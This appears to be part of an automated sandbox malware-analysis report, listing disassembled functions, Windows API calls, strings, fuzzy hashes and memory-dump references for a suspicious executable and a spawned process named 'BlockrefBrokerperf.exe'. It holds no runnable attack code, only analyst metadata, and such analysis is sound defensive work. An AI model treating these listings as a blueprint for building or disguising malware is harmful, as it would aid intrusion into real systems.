String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: d3fd4737267bdb3c0dc7df5e311205d388fad565eaec43987ab40f97017a849f
Instruction ID: 3cb52d1cbc53fa74c8eab44ee1dcdbd04c4267b88ac8c0f96e6c4493a7df47dd
Opcode Fuzzy Hash: d3fd4737267bdb3c0dc7df5e311205d388fad565eaec43987ab40f97017a849f
Instruction Fuzzy Hash: CA017176604349EFDF55AF95FC88E967BB8F709394B080426F906C7231C6319C50DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 008A9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008A9AA9
__alldvrm.LIBCMT ref: 008A9CAA
__alldvrm.LIBCMT ref: 008A9CCC

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: 5a8a3aeb6c75a2dd34e0395bf7a88b588e76675501a4b4fe6124021852657f18
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: 13A13672A087969FFB21CF18C8817AEBBE5FF52320F1841ADE5C5DBA81D2389941C751

Uniqueness

Uniqueness Score: -1.00%

Function 0088A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00887F69,?,?,?), ref: 0088A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00887F69,?), ref: 0088A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00887F69,?,?,?,?,?,?,?), ref: 0088A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00887F69,?,?,?,?,?,?,?,?,?,?), ref: 0088A4C6

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: caf71bc09f36f3c49614c4cf98f187b99cd4cef52dd7cc8bc38c5ff43b0732d6
Instruction ID: d9a6a6221f8c23059245a9c88f10ff03c90c148335f9ade396094d09d1433adb
Opcode Fuzzy Hash: caf71bc09f36f3c49614c4cf98f187b99cd4cef52dd7cc8bc38c5ff43b0732d6
Instruction Fuzzy Hash: 7F41AF312883819AEB35EF24DC45BAEBBE4FF85700F08091AB5D1D32D1D6A49A48DB53

Uniqueness

Uniqueness Score: -1.00%

Function 00881100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0088112B
_wcslen.LIBCMT ref: 00881153
_wcslen.LIBCMT ref: 00881182
_wcslen.LIBCMT ref: 008811A9

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: d67e453a144281de4e3388d73e6410a5ff4d752e55bb1c3d1e5153114dab59ef
Instruction ID: 8a851c9a71a141d2bd1787b33e57efc739e31a9d5fe04647b5d9d50cb44b969d
Opcode Fuzzy Hash: d67e453a144281de4e3388d73e6410a5ff4d752e55bb1c3d1e5153114dab59ef
Instruction Fuzzy Hash: F941B3719006699BCB61EF688C499EE7BBCFF11310F040029F946E7241DF30AE558BA1

Uniqueness

Uniqueness Score: -1.00%

Function 008AC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008A91E0,?,00000000,?,00000001,?,?,00000001,008A91E0,?), ref: 008AC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008ACA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008A6CBE,?), ref: 008ACA70
__freea.LIBCMT ref: 008ACA79

Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: b09f50e0416d1f3c3efbb27f67e4699911b26d12e969e34b303bd6f19c491a9b
Instruction ID: bddcff19ebc888f3d3c3715aaab5b91598532b2d7dfe10720eec24c2db0f0e11
Opcode Fuzzy Hash: b09f50e0416d1f3c3efbb27f67e4699911b26d12e969e34b303bd6f19c491a9b
Instruction Fuzzy Hash: F0318072A0021AABEF25DF68DC45EBF7BA5FB42310B144268FC14E6251EB35ED50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0089A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0089A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 0089A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0089A683
ReleaseDC.USER32(00000000,00000000), ref: 0089A691

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7765de110a9534e2d2d1974b4bd69244cdfc1939b2552d0c470cf89c5d58a1c2
Instruction ID: f2ad37eb74783900b6c0af642cea181c2000660a059e48d3529a9ec928be5713
Opcode Fuzzy Hash: 7765de110a9534e2d2d1974b4bd69244cdfc1939b2552d0c470cf89c5d58a1c2
Instruction Fuzzy Hash: ACE0EC31986F61E7D6A55B60AC4DB8B3E64BB15B52F050111FA05AB190DB748A008BE5

Uniqueness

Uniqueness Score: -1.00%

Function 0089A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 0089A699: GetDC.USER32(00000000), ref: 0089A69D
Part of subcall function 0089A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0089A6A8
Part of subcall function 0089A699: ReleaseDC.USER32(00000000,00000000), ref: 0089A6B3

GetObjectW.GDI32(?,00000018,?), ref: 0089A83C

Part of subcall function 0089AAC9: GetDC.USER32(00000000), ref: 0089AAD2
Part of subcall function 0089AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0089AB01
Part of subcall function 0089AAC9: ReleaseDC.USER32(00000000,?), ref: 0089AB99

Strings

(, xrefs: 0089A9AA

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 99937418be68e4fe5fa41453ed482ef67dffc5db640e62eef491a5a7c1267f03
Instruction ID: fcfeb22b97111245c60a5a21a87506021e8297ba86ed9104f71475746bdd79cf
Opcode Fuzzy Hash: 99937418be68e4fe5fa41453ed482ef67dffc5db640e62eef491a5a7c1267f03
Instruction Fuzzy Hash: F991F271604355AFDA15DF25C844A2BBBE9FFC9701F04491EF59AD7220DB30A905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 008AB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008AB324

Part of subcall function 008A9097: IsProcessorFeaturePresent.KERNEL32(00000017,008A9086,00000050,008B3A34,?,0088D710,00000004,008C1030,?,?,008A9093,00000000,00000000,00000000,00000000,00000000), ref: 008A9099
Part of subcall function 008A9097: GetCurrentProcess.KERNEL32(C0000417,008B3A34,00000050,008C1030), ref: 008A90BB
Part of subcall function 008A9097: TerminateProcess.KERNEL32(00000000), ref: 008A90C2

Strings

., xrefs: 008AB4DB
*?, xrefs: 008AB1FB

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: 5e81850367eb4b16950e648e971fa6e9042ab1988817a4ac7e5b07fd9b22e04f
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: 95516F71E0010AAFEF14DFA8C881AADBBF5FF59314F24816AE854E7741E7759A018B50

Uniqueness

Uniqueness Score: -1.00%

Function 008875DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008875E3

Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0

Part of subcall function 0088A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0088A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0088777F

Part of subcall function 0088A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A501
Part of subcall function 0088A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A532

Strings

:, xrefs: 00887654

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 1624d05b09ae9fc59d0ef36c92c366402c013faf8b98b276460b8ae988a8a5f5
Instruction ID: 61c331e97cc0d346f9b1e47b8761276345c670d2277853df025640bf3ef480a7
Opcode Fuzzy Hash: 1624d05b09ae9fc59d0ef36c92c366402c013faf8b98b276460b8ae988a8a5f5
Instruction Fuzzy Hash: 74416E71804558A9EB25FB68CC55EEEB37CFF51300F1440A6B645E2092EB749F88CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0089B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0089B4E3
_wcslen.LIBCMT ref: 0089B4FE

Strings

}, xrefs: 0089B4D6

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 220fa160a2b78db68428d525532c9c4dc3aba186434b650ecdf027b7dabd3fc2
Instruction ID: 62852977270108e6264634d526f350596b5e9d01a76db6aae42908f15dce3a37
Opcode Fuzzy Hash: 220fa160a2b78db68428d525532c9c4dc3aba186434b650ecdf027b7dabd3fc2
Instruction Fuzzy Hash: BF21047290430A5ADB31FA68EA45E6AB3DCFF92710F09042AF540C3601FB64DD5883A3

Uniqueness

Uniqueness Score: -1.00%

Function 0088F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0088F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0088F2E4
Part of subcall function 0088F2C5: GetProcAddress.KERNEL32(008C81C8,CryptUnprotectMemory), ref: 0088F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0088F33E), ref: 0088F3D2

Strings

CryptProtectMemory failed, xrefs: 0088F389
CryptUnprotectMemory failed, xrefs: 0088F3CA

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 64b65865ebd2c2eb52a8eb74a6bd0fb2c1eb814e94c07e065638fb53ae8636ee
Instruction ID: 345cbf8f3af18a027ccf9a94afe1d045fe3945e9552564a3b0848906eeee5786
Opcode Fuzzy Hash: 64b65865ebd2c2eb52a8eb74a6bd0fb2c1eb814e94c07e065638fb53ae8636ee
Instruction Fuzzy Hash: 87112231600629ABDF12BF24DC45A6E3B65FF00760F14412AFD01EB393DB35AE018B91

Uniqueness

Uniqueness Score: -1.00%

Function 0088B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0088B9B8

Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5

Strings

%c:\, xrefs: 0088B9AE

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 9d842161abec6b37061b9cf0d221644ab0e44eafce5a0bd54612bb0a4cfaa0ab
Instruction ID: ee32f304b06b75e54df743c889ce5326f9f6a13f490dd963fc6acec5125b3ef3
Opcode Fuzzy Hash: 9d842161abec6b37061b9cf0d221644ab0e44eafce5a0bd54612bb0a4cfaa0ab
Instruction Fuzzy Hash: 0701F56350032269AA347B398C42D6BBBACFFD2770B40440AF545D6582FB20D85083B2

Uniqueness

Uniqueness Score: -1.00%

Function 0089101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00891160,?,00000000,00000000), ref: 00891043
SetThreadPriority.KERNEL32(?,00000000), ref: 0089108A

Part of subcall function 00886C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00886C54

Strings

CreateThread failed, xrefs: 0089104F

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 8d329d8f8db0380658a6abee657ffbff3994db3f3f9144aa48be1a9ec856b981
Instruction ID: b4cacabd23373716d066290364f254db314d370d6310b114410d36c0d12eebaa
Opcode Fuzzy Hash: 8d329d8f8db0380658a6abee657ffbff3994db3f3f9144aa48be1a9ec856b981
Instruction Fuzzy Hash: 0901DB7534870B6FDB307E649C99F7673A9FB40751F14002EF686D2381DBB1A8954724

Uniqueness

Uniqueness Score: -1.00%

Function 00881316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0088E2E8: _swprintf.LIBCMT ref: 0088E30E
Part of subcall function 0088E2E8: _strlen.LIBCMT ref: 0088E32F
Part of subcall function 0088E2E8: SetDlgItemTextW.USER32(?,008BE274,?), ref: 0088E38F
Part of subcall function 0088E2E8: GetWindowRect.USER32(?,?), ref: 0088E3C9
Part of subcall function 0088E2E8: GetClientRect.USER32(?,?), ref: 0088E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0088135A
SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370

Strings

0, xrefs: 00881319

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: b74e5ea71c49e76b407df868860a247cc49714961450eaa04d6579b7b3dacdde
Instruction ID: eda292d63c5025264faee37ad41edb2c12584f9ab1272333bb46b97257f249bc
Opcode Fuzzy Hash: b74e5ea71c49e76b407df868860a247cc49714961450eaa04d6579b7b3dacdde
Instruction Fuzzy Hash: D1F03C30144288ABDF252F65884DBEA3B6DFB45344F048618FD46D5AA2CF78CA96AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00890FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00891206,?), ref: 00890FEA
GetLastError.KERNEL32(?), ref: 00890FF6

Part of subcall function 00886C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00886C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00890FFF

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 3a07c23c397102f41c4ad38259be2a60e4beb35325539e79ebfb1be189033828
Instruction ID: 1848b3a275791186850d768d6eedf80d63594f5f6740770aa5357b1900c8f2d2
Opcode Fuzzy Hash: 3a07c23c397102f41c4ad38259be2a60e4beb35325539e79ebfb1be189033828
Instruction Fuzzy Hash: 43D02B3150893276CE1033285D0AD6E7905FF12331F140704F138D03F2CB2549925392

Uniqueness

Uniqueness Score: -1.00%

Function 0088E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0088DA55,?), ref: 0088E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0088DA55,?), ref: 0088E2B1

Strings

RTL, xrefs: 0088E2AB

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 66becb13ab3a20880edf5bfce3bdbe4a456e9d14b7b631d30ff074867e8bf9ea
Instruction ID: 374daad87327dfce96e87facd162a1f3b447c2917c48688ada6fac5e4f338458
Opcode Fuzzy Hash: 66becb13ab3a20880edf5bfce3bdbe4a456e9d14b7b631d30ff074867e8bf9ea
Instruction Fuzzy Hash: 05C01231284F2066E63037646C0DB836B98BF01B11F050548B181EA2D2D6A5D54187A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: BlockrefBrokerperf.exePID: 5520, Parent PID: 2520COMMON

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	26
Total number of Limit Nodes:	2

Executed Functions

Function 00007FF84913D1C1 Relevance: 6.2, Strings: 4, Instructions: 1173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p,_^, xrefs: 00007FF84913D401
q,_^, xrefs: 00007FF84913D301
